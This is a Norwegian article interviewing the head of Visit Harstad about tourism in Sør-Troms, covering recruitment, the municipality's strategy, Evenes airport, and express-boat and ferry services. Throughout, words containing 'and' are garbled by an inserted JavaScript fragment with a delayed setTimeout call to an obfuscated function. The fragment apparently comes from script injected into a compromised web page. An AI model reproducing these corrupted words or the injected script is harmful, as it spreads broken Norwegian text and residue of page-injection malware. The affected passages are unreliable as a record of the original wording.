Reiselivet trenger forutsigbarhet og kompetent arbeidskraft

Jan Erik Kristoffersen

Reiselivsbransjen i Harstad opplever vekst sammen med resten av Nord-Norge, men hva er grunnen til at veksten er mindre i Sør-Troms enn i resten av landom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andsdelen? Daglig leder i Visit Harstad deler sitt perspektiv på hva som skal til for at reiselivet i regionen skal få en positiv utvikling.

Reiselivet har en kompetanseutfordring

– Utdanning og næringsutvikling innenfor reiseliv henger definitivt sammen. Det er et generelt fokus i vår bransje på å rekruttere kompetent arbeidskraft, og det er en utfordring for oss her i Harstad at det ikke finnes en reiselivslinje på de videregående skolene i regionen. Det tok 2 år for oss å finne en lærling, og vi har sett at det ikke er aktuelt for studenter med bachelor i reiseliv å begynne som lærling i vår bransje. Samtidig er det et paradoks at de samme studentene mangler relevant erfaring til å få reiselivsjobber, forklarer Jan Erik Kristoffersen.

Kompetanse blir også viktig for å sikre attraktive reiselivsprodukter i fremtiden, og som i alle andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre bransjer er det behov for produktutvikling. Hurtigruten ønsker seg flere produkter fra denne regionen, blant annet er det konkrete forespørsler om å få komme til Rå og til bærbøndene i Kvæfjord for å plukke bær.

– Her må det samarbeid til for at bøndene skal kunne få en tilleggsinntekt til grønnsak- og bærproduksjonen. For å håndtere større grupper kreves det gjennomgående kvalitetsfokus i hele verdikjeden og en forutsigbarhet slik at produktet kan bookes i god tid før reisen, ofte et år i forveien, utdyper Kristoffersen.

Kommunens rolle

Reiseliv er en viktig næring for Harstad, i følge tall fra 2012 omsettes det for 1 milliard årlig, og resulterer i 800 arbeidsplasser i kommunen. Reiselivet representerer også en viktig næring for regionen, siden små reiselivsbedrifter muliggjør spredt bosetting og skaper bolyst.

– Harstad kommune trenger en tydelig reiselivsstrategi som tydeliggjør at dette er en næring det satses på, og at vi ser konsekvensene i en slik strategi gjennom konkrete prioriteringer i infrastrukturspørsmål. Reiseliv har flere fellesnevnere med andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre bransjer, og reiselivsbedrifter finnes på tvers av bransjer; transport, servering, overnatting og opplevelsesbedrifter. Disse utgjør viktige dimensjoner også for andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre bransjer, og spesielt er tilbudene viktig i et bolystperspektiv for å gjøre Harstad attraktiv for nye innbyggere, mener Kristoffersen

Evenes lufthavn en viktig faktor for videre vekst

En av faktorene som slår positivt ut for reiselivsutviklingen er Evenes lufthavn, som kan ta imot alle størrelser passasjerfly. Evenes er foretrukket av internasjonale turoperatører, noe som har blitt spesielt tydelig etter at Nord-Norge fikk et eget charterfond i regi av Nordnorsk Reiseliv. Av lufthavnene i Nord-Norge er det Evenes som mottar flest søknader fra utlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andet.

– Evenes har et svært attraktivt omlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and med både Lofoten, Sverige og ikke minst Harstadregionen innenfor rekkevidde. Med sin store kapasitet representerer Evenes en kilde til vekst for reiselivet, men det krever økt samarbeid og evne til å håndtere større grupper, utdyper Kristoffersen.

Infrastruktur avgjørende faktor

Tilbudet innenfor ferge og hurtigbåt er spesielt viktig for Sør-Troms, og når det gjelder hurtigbåttilbudet er det avgjørende at reiselivspassasjerer kan reservere seter og slik være sikret å komme med riktig avgang.

– Vi har flere eksempler på at større grupper har vært nødt til å avlyse program i Harstad og regionen som en del av en rundtur på grunn av manglende bookingsystem. Når vi planlegger opplevelser i regionen er det ikke holdbart å være nødt til å ha busstransport i bakhånd i tilfelle planlagt transportmiddel ikke har forventet kapasitet.

Dette er ikke bare et fordyrende element, men gjør at kundene får kortere tid til opplevelser, og bruker dermed mindre penger regionen.

– Kompaktheten til Sør-Troms er en av de egenskapene vi ønsker å selge til internasjonale gjester, men tilbudene vi leverer vurderes både på hvor effektivt de kan gjennomføres og hva prisen per person blir. Det sier seg selv at flere timer i buss ikke fremstår som en attraktiv løsning for gjester som ønsker å oppleve mest mulig når de er her, understreker Kristoffersen

– Vi trenger en hurtigbåt som leverer i forhold til kundebehov – slik at vi ikke fokuserer kun på enkeltfaktorer som kanskje ikke gir et riktig totalbilde. Miljøregnskapet er et eksempel på dette. Hvis forretningsreisende velger å ta fly eller kjøre selv i stedet for å benytte hurtigbåten nytter det lite om båtene er noe mer miljøvennlige. Ved å fokusere på behov vil man også kunne komme opp med attraktive løsninger som kan utløse betalingsvilje, for eksempel et panoramadekk, møterom og avdeling for forretningsreisende, samt økt fokus på å servere sunn og gjerne lokal mat, foreslår Kristoffersen

Dette er viktig nå fordi Troms Fylkestrafikk nå gjør klart for en ny anbudsperiode.

– Det er derfor viktig at innspillene fra hele næringslivet i vår region kommer tydelig frem. Leverandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andør for den neste 10-årsperioden velges i 2017, og grunnlaget for dette valget legges allerede høsten 2016 gjennom beskrivelsen av hva kravene til leverandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andør og tjenesten skal være.

Manglende fergetilbud skaper blindveier

Daglig må turistinformasjonen i Harstad beklage overfor gjester som ønsker å reise til Senja med fergetilbud fra utgåtte fergeruter.

– Slik det er nå er Harstad og Kvæfjord blitt en blindvei på turen nordover. Gjestene som kommer hit ønsker å oppleve kystlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andskapet, ikke transporteres på E6. Visit Harstad mener forbindelsen Bjarkøy – Skrolsvik bør åpnes med langsiktig perspektiv etter Bjarkøyforbindelsen er etablert. Dette vil gjøre det mulig å utvikle bedrifter i skjærgården i Harstad – nye arbeidsplasser for kommunen.

Visit Harstad satser digitalt

Destinasjonsselskapet fokuserer nå på økt digital synlighet, og målsetningen er å være det største digitale vinduet ut mot verden for regionen.

– Vi ønsker å være en motor i reiselivsutviklingen, og håper regionen i større grad kan dra i samme retning for slik å få en sterkere stemme og kunne bygge en mer tydelig posisjon for regionen. Samarbeid på tvers av næringer skaper spennende løsninger og nye muligheter for å trekke gjester i ordets videste forstandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and – både de på besøk og de som ønsker å bosette seg, avslutter Kristoffersen.

Fakta om Visit Harstad AS
Destinasjonsselskap eid av Harstad, Kvæfjord, Ibestad, Gratangen, Skånlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and, Tjeldsund og Evenes. Samarbeidsavtaler med Harstad og Skånlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and om markedsføring av reiselivstilbud. 6-7 årsverk: 1 lærling, 3 guider og 3 fast ansatte.